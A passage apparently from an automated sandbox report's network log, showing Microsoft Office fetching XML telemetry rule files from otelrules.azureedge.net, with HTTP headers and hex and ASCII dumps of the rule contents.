N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-12-08 18:53:02 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-12-08 18:53:02 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-12-08 18:53:03 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-12-08 18:53:03 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-12-08 18:53:03 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49762	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:04 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:05 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:05 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: c11b12be-901e-0048-4704-48b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185305Z-r1cf579d7789trgthC1EWRkkfc00000006r000000000b4p6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:05 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49761	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:04 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:05 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 3fcd35f4-e01e-0052-4b02-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185305Z-r1cf579d778dfdgnhC1EWRd3w000000005yg0000000055zg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:05 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49763	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:04 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:05 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 2b116ba0-201e-0051-0503-487340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185305Z-r1cf579d778v97q7hC1EWRf95c00000005r00000000075sb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:05 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49764	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:04 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:05 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: a36b2733-e01e-0051-6f03-4884b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185305Z-r1cf579d778mvsklhC1EWRkavg00000006fg000000001rd2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:05 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49765	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:04 UTC	192	OUT	GET /rules/rule120100v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:05 UTC	492	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:05 GMT Content-Type: text/xml Content-Length: 1000 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB097AFC9" x-ms-request-id: cb80336d-801e-0078-59bd-47bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185305Z-r1cf579d7782w22mhC1EWR2ebg000000014g000000001w70 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:05 UTC	1000	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 31 30 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 52 65 73 75 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 33 22 20 49 3d 22 33 30 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 35 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <A T="2" E="TelemetryResume" /> <TI T="3" I="30s" /> <R T="4" R="120100" /> <TH T="5">

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49767	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:07 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:07 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:07 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: b9950e54-401e-0015-4806-480e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185307Z-r1cf579d778dndrdhC1EWR4b2400000005sg000000006qrx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:07 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49771	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:07 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:07 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:07 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 09beb194-c01e-008e-544f-497381000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185307Z-r1cf579d7782v2q5hC1EWRt9bw00000000y0000000002qmd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:07 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49768	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:07 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:07 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:07 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 1496b81c-e01e-0003-0d90-490fa8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185307Z-r1cf579d7782v2q5hC1EWRt9bw00000000sg00000000adm6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:53:07 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49769	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:07 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:07 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:07 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: c8d44b57-401e-0067-6578-4909c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185307Z-r1cf579d7789jf56hC1EWRu588000000018g000000005e2z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:07 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
